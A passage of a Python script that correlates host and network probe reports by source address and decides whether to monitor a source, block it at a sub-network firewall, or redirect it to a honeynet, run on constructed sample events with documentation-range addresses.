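    network: str  # sub-network the probe belongs to (e.g. "C2", "Surveillance")
    probe: str    # "host" or "network" probe
    source: str   # address the probe attributes the activity to
    kind: str     # constructed event type reported by the probe


def correlate(events, threshold=3):
    """Return {source: (action, sorted sub-networks)} for all reported sources.

    Below `threshold` events a source is only monitored. At or above it,
    activity confined to one sub-network is blocked at that network's
    firewall; activity spanning several sub-networks means perimeter
    controls did not stop it, so the traffic is redirected to the honeynet
    to collect attacker behaviour for the detection algorithms.
    """
    per_source = defaultdict(list)
    for ev in events:
        per_source[ev.source].append(ev)

    decisions = {}
    for source, evs in per_source.items():
        networks = sorted({ev.network for ev in evs})
        if len(evs) < threshold:
            decisions[source] = ("monitor", networks)
        elif len(networks) > 1:
            decisions[source] = ("redirect_to_honeynet", networks)
        else:
            decisions[source] = ("block_at_firewall", networks)
    return decisions


# Constructed sample reports; addresses come from the RFC 5737 documentation ranges.
SAMPLE_EVENTS = [
    ProbeEvent("C2", "network", "203.0.113.7", "port_scan"),
    ProbeEvent("C2", "network", "203.0.113.7", "port_scan"),
    ProbeEvent("C2", "host", "203.0.113.7", "auth_failure"),
    ProbeEvent("Surveillance", "host", "192.0.2.41", "auth_failure"),
    ProbeEvent("Surveillance", "network", "192.0.2.41", "port_scan"),
    ProbeEvent("C2", "host", "192.0.2.41", "auth_failure"),
    ProbeEvent("Surveillance", "network", "198.51.100.9", "port_scan"),
]

if __name__ == "__main__":
    for src, (action, nets) in correlate(SAMPLE_EVENTS).items():
        print(f"{src:15} {action:22} networks={nets}")
```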
